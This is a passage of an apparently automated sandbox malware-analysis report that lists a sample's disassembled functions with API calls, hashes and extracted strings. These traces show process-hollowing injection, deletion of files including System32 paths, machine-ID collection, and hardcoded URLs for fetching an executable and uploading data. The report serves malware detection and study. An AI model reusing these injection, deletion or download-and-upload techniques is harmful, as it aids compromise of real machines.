                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: lstrcpy$Local$CloseFreeHandle$AllocBinaryCryptString_memset
                                                                                                            • String ID: %s %s$HWID_%s$Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0$https://woo097878781.win/32.EXE$https://woo097878781.win/upload.php${2CE5F8BD-0511-45BE-87AB-414E34221A74}${7E105FD4-6112-4FB9-A722-91E984087449}${DD790A50-FBBA-44EC-A8E0-C3475C4234CA}${DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}${E29CBB21-643E-472E-B199-71CB48A8D055}
                                                                                                            • API String ID: 2754469768-1647865491
                                                                                                            • Opcode ID: 88ced15b202611c56690298a27b3dace0b7759176b0335eef1db7323af0d444f
                                                                                                            • Instruction ID: 090a177fbb6644304781238786549312d69827a0ac06fda32dbc3408e490d39d
                                                                                                            • Opcode Fuzzy Hash: 88ced15b202611c56690298a27b3dace0b7759176b0335eef1db7323af0d444f
                                                                                                            • Instruction Fuzzy Hash: 10E1BE74A11604DFD736CB50ECAAFAA77BCAB48300F009569E50EA72E1E7759AC4CF50
                                                                                                            Function 00316D30 Relevance: 68.8, APIs: 38, Strings: 1, Instructions: 529threadsynchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316DC7
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316DF9
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00316E17
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000E020,-00379F18,00000004,00000000), ref: 00316E4C
                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 00316E8C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316EA5
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316EAF
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00316EF9
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316F31
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316F63
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00316F81
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000E020,-00379F18,00000004,00000000), ref: 00316FB5
                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 00316FF5
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 003170B8
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0031716A
                                                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 00317187
                                                                                                            • closesocket.WS2_32(?), ref: 00317193
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$CreateThread$EventResumesetsockopt$InfoLocaleObjectSingleWait___crtclosesocket
                                                                                                            • String ID: d
                                                                                                            • API String ID: 404341171-2564639436
                                                                                                            • Opcode ID: 923e2cdaa8036ba7fc9005409b7ef1e617146c89627df48e43238d3aa3addbe2
                                                                                                            • Instruction ID: 027f1f6ad97d3d08dead209f90f7cba9bbc56f62ec6e2c3db5cd311c6635c747
                                                                                                            • Opcode Fuzzy Hash: 923e2cdaa8036ba7fc9005409b7ef1e617146c89627df48e43238d3aa3addbe2
                                                                                                            • Instruction Fuzzy Hash: 96328E71A04204DFDB19CF94C899BEEBBB9FB48304F298619E516AF2D0C7749886CF50
                                                                                                            Function 00321580 Relevance: 60.5, APIs: 40, Instructions: 459synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 003215F6
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 0032163E
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 00321678
                                                                                                            • WaitForMultipleObjects.KERNEL32(00000006,?,00000000,000000FF), ref: 003218CE
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 00321BD7
                                                                                                            • shutdown.WS2_32(00000000,00000002), ref: 00321D0F
                                                                                                            • closesocket.WS2_32(00000000), ref: 00321D23
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321D52
                                                                                                            • shutdown.WS2_32(00000000,00000002), ref: 00321D7D
                                                                                                            • closesocket.WS2_32(00000000), ref: 00321D8A
                                                                                                            • LocalFree.KERNEL32(?), ref: 00321D9E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Wait$ObjectSingle$closesocketshutdown$CloseFreeHandleLocalMultipleObjects
                                                                                                            • String ID:
                                                                                                            • API String ID: 3117981272-0
                                                                                                            • Opcode ID: b6bcd28c9bead63a4045dad91c21b9a61804a7c44694d7722cd4330d45a51dec
                                                                                                            • Instruction ID: 0ba2f6d60eeccbd7a53e5e5f4464f333ae46be8727beeeb8e7daaeab1dc5f918
                                                                                                            • Opcode Fuzzy Hash: b6bcd28c9bead63a4045dad91c21b9a61804a7c44694d7722cd4330d45a51dec
                                                                                                            • Instruction Fuzzy Hash: EB222B74A003289FDB25CF94EE89BEA7779BF98304F108199E649A7280D7B45EC4CF51
                                                                                                            Function 0030A1B0 Relevance: 54.5, APIs: 30, Strings: 1, Instructions: 283nativethreadinjectionCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0030A1B9
                                                                                                            • _memset.LIBCMT ref: 0030A1CA
                                                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,?,00000044,00302000), ref: 0030A21B
                                                                                                            • NtCreateSection.NTDLL(00000000,00000006,00000000,?,00000004,08000000,00000000), ref: 0030A251
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 0030A285
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 0030A290
                                                                                                            • _memmove.LIBCMT ref: 0030A2AF
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00302000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 0030A2DA
                                                                                                            • NtCreateSection.NTDLL(00000000,0000000E,00000000,?,00000040,08000000,00000000), ref: 0030A320
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0030A360
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 0030A36E
                                                                                                            • _memmove.LIBCMT ref: 0030A390
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00302000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0030A3C7
                                                                                                            • _memset.LIBCMT ref: 0030A3E8
                                                                                                            • GetThreadContext.KERNEL32(?,00010007), ref: 0030A405
                                                                                                            • WriteProcessMemory.KERNEL32(00302000,?,?,00000004,?), ref: 0030A447
                                                                                                            • SetThreadContext.KERNEL32(?,00010007), ref: 0030A461
                                                                                                            • ResumeThread.KERNEL32(?), ref: 0030A470
                                                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 0030A486
                                                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 0030A494
                                                                                                            • NtClose.NTDLL(00000000), ref: 0030A49E
                                                                                                            • NtClose.NTDLL(00000000), ref: 0030A4AB
                                                                                                            • NtUnmapViewOfSection.NTDLL(00302000,00000000), ref: 0030A4E6
                                                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 0030A4F7
                                                                                                            • NtClose.NTDLL(00000000), ref: 0030A504
                                                                                                            • NtUnmapViewOfSection.NTDLL(00302000,00000000), ref: 0030A512
                                                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 0030A520
                                                                                                            • NtClose.NTDLL(00000000), ref: 0030A52A
                                                                                                            • CloseHandle.KERNEL32(00302000), ref: 0030A534
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0030A53E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Section$View$CloseUnmap$Process$CreateCurrentThread$ContextHandle_memmove_memset$MemoryResumeWrite
                                                                                                            • String ID: D
                                                                                                            • API String ID: 987980044-2746444292
                                                                                                            • Opcode ID: 92851107b34d950fe4635aa33778da098040353d11414eb254d578b7bab2a66d
                                                                                                            • Instruction ID: 806b76fc99fc7f1aed25e4dd8888c484ed45efc7494ba61de395be9e2ecef1e6
                                                                                                            • Opcode Fuzzy Hash: 92851107b34d950fe4635aa33778da098040353d11414eb254d578b7bab2a66d
                                                                                                            • Instruction Fuzzy Hash: 12C10EB5A10318AFDB25CFA4DD49F9EB7B9BB48700F208558F609AB290D774A981CF50
                                                                                                            Function 00313620 Relevance: 45.7, APIs: 22, Strings: 4, Instructions: 175sleepfilestringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$__snwprintf_memset$FindSleep$AttributesDirectoryRemove$CloseDeleteFirstFolderFreeKnownNextPathTasklstrlen
                                                                                                            • String ID: %s\%s$%s\*.*$%s\System32$\\?\%s
                                                                                                            • API String ID: 1835786642-2457321626
                                                                                                            • Opcode ID: 66cb183104a2395580ebbdb756b4e45d7f1a766e807477f3abb5a7ea881ae408
                                                                                                            • Instruction ID: a0898882b2d29f45e00d6fde64ec1fe5f7bd1c2c3bb9c597b206be5696fe1a6c
                                                                                                            • Opcode Fuzzy Hash: 66cb183104a2395580ebbdb756b4e45d7f1a766e807477f3abb5a7ea881ae408
                                                                                                            • Instruction Fuzzy Hash: BD618FB1910218ABEB39DB60DC89BE97779BF48300F5485D8F519A6180EB759FC8CF90
                                                                                                            Function 0031CA90 Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 144memoryfilestringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 0031CAA5
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0031CABD
                                                                                                            • wnsprintfW.SHLWAPI ref: 0031CAE2
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0031CAF2
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 0031CB10
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0031CB2F
                                                                                                            • lstrcmpW.KERNEL32(?,00337444), ref: 0031CB4D
                                                                                                            • lstrcmpW.KERNEL32(?,00337448), ref: 0031CB63
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0031CB88
                                                                                                            • wnsprintfW.SHLWAPI ref: 0031CBB9
                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 0031CBE4
                                                                                                            • GetLastError.KERNEL32 ref: 0031CBF6
                                                                                                            • LocalFree.KERNEL32(?), ref: 0031CC08
                                                                                                            • wnsprintfW.SHLWAPI ref: 0031CC29
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 0031CC36
                                                                                                            • FindNextFileW.KERNEL32(000000FF,?), ref: 0031CC47
                                                                                                            • FindClose.KERNEL32(000000FF), ref: 0031CC59
                                                                                                            • GetLastError.KERNEL32 ref: 0031CC69
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031CC78
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031CC82
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$AllocFileFindFreewnsprintf$ErrorLastObjectSingleWaitlstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                                                            • String ID: %s%s$%s%s\$%s*.*
                                                                                                            • API String ID: 3901725581-784047915
                                                                                                            • Opcode ID: d5c1c8c18c2281ae748b205684f1d8d5ffe25fab82ca81e8f4ee207d6bd79d34
                                                                                                            • Instruction ID: ea2ec99b4665c6b690cadce3838ad9adc6ba848ba5690218b0ea9def093a016e
                                                                                                            • Opcode Fuzzy Hash: d5c1c8c18c2281ae748b205684f1d8d5ffe25fab82ca81e8f4ee207d6bd79d34
                                                                                                            • Instruction Fuzzy Hash: DB516EB0A54209EBDB2AEFA4DD8DBEB7779BF48301F008598F60996190D734AD85CF50
                                                                                                            Function 0031F9E0 Relevance: 28.7, APIs: 19, Instructions: 168networkmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 0031FA18
                                                                                                            • und_memcpy.LIBCMTD ref: 0031FA3D
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0031FA4D
                                                                                                            • wsprintfW.USER32 ref: 0031FA89
                                                                                                            • GetForegroundWindow.USER32(?), ref: 0031FAA2
                                                                                                            • SetWindowTextW.USER32(00000000), ref: 0031FAA9
                                                                                                            • WSAEventSelect.WS2_32(00000000,00000000,00000021), ref: 0031FAB9
                                                                                                            • WSAWaitForMultipleEvents.WS2_32(-00000001,00000000,00000000,000003E8,00000001), ref: 0031FADB
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031FB03
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031FB0D
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031FB3A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031FB44
                                                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 0031FB6A
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031FB89
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031FB93
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031FBF5
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031FBFF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$CloseFreeHandle$EventWindow$AllocCreateEventsForegroundInfoLocaleMultipleSelectTextWait___crtund_memcpywsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 924265577-0
                                                                                                            • Opcode ID: 7022d9b3bc39afb5d745232817d385d2e59adb1de09afc48d3ed7e830848c98c
                                                                                                            • Instruction ID: 7a66c94199498d31deaec1c9f419723c3547e4238ecf370cdd60774a35cf586b
                                                                                                            • Opcode Fuzzy Hash: 7022d9b3bc39afb5d745232817d385d2e59adb1de09afc48d3ed7e830848c98c
                                                                                                            • Instruction Fuzzy Hash: C4713CB4D00209EFCB19DFA4D989BEFBBB9BF48304F108559E915A7290C7749A85CF90
                                                                                                            Function 00322530 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 116librarymemoryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000318), ref: 00322540
                                                                                                            • LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 00322558
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0032256B
                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00322581
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00322594
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$AddressAllocLibraryLoadProc
                                                                                                            • String ID: NTDLL.DLL$RtlGetVersion
                                                                                                            • API String ID: 2539306102-196638859
                                                                                                            • Opcode ID: bc9e533d233943b98133f48449688f2e5f2b67c826918a8f227bf4134fe03f38
                                                                                                            • Instruction ID: aa0917bbdf6981c63043358c2605ec27f2ece7350a7b9721215531fb252e79e3
                                                                                                            • Opcode Fuzzy Hash: bc9e533d233943b98133f48449688f2e5f2b67c826918a8f227bf4134fe03f38
                                                                                                            • Instruction Fuzzy Hash: 5251E574A00218EFCB26DF64DD98BDAB7B9BF48304F1085A8E909A7250DB749F80DF50
                                                                                                            Function 0031F7D0 Relevance: 27.2, APIs: 18, Instructions: 162networkmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 0031F805
                                                                                                            • und_memcpy.LIBCMTD ref: 0031F82A
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0031F83A
                                                                                                            • WSAEventSelect.WS2_32(00000000,00000000,00000021), ref: 0031F869
                                                                                                            • WSAWaitForMultipleEvents.WS2_32(-00000001,00000000,00000000,00000000,00000000), ref: 0031F88A
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031F8A7
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031F8B1
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031F8D6
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031F8E0
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031F9C8
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031F9D2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$CloseFreeHandle$Event$AllocCreateEventsMultipleSelectWaitund_memcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3749125693-0
                                                                                                            • Opcode ID: 13b35769e7bcd73d1b5e69a4ce2fb5c36310d96684cf0dc3df340a0a596542a6
                                                                                                            • Instruction ID: ef3945d20f8b65778b657df16d2364a17a34bf139649e606ebd4aa8fcfc87832
                                                                                                            • Opcode Fuzzy Hash: 13b35769e7bcd73d1b5e69a4ce2fb5c36310d96684cf0dc3df340a0a596542a6
                                                                                                            • Instruction Fuzzy Hash: 9D613D74900209EFCB19DFA4C989BEEBBB9BF4C304F108659E905A7390C7359A85CF90
                                                                                                            Function 0031FC10 Relevance: 25.7, APIs: 17, Instructions: 154networkmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 0031FC45
                                                                                                            • und_memcpy.LIBCMTD ref: 0031FC6A
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0031FC7A
                                                                                                            • WSAEventSelect.WS2_32(00000000,00000000,00000022), ref: 0031FCA9
                                                                                                            • WSAWaitForMultipleEvents.WS2_32(-00000001,00000000,00000000,00000000,00000000), ref: 0031FCCA
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031FCE7
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031FCF1
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031FD16
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031FD20
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031FDED
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031FDF7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
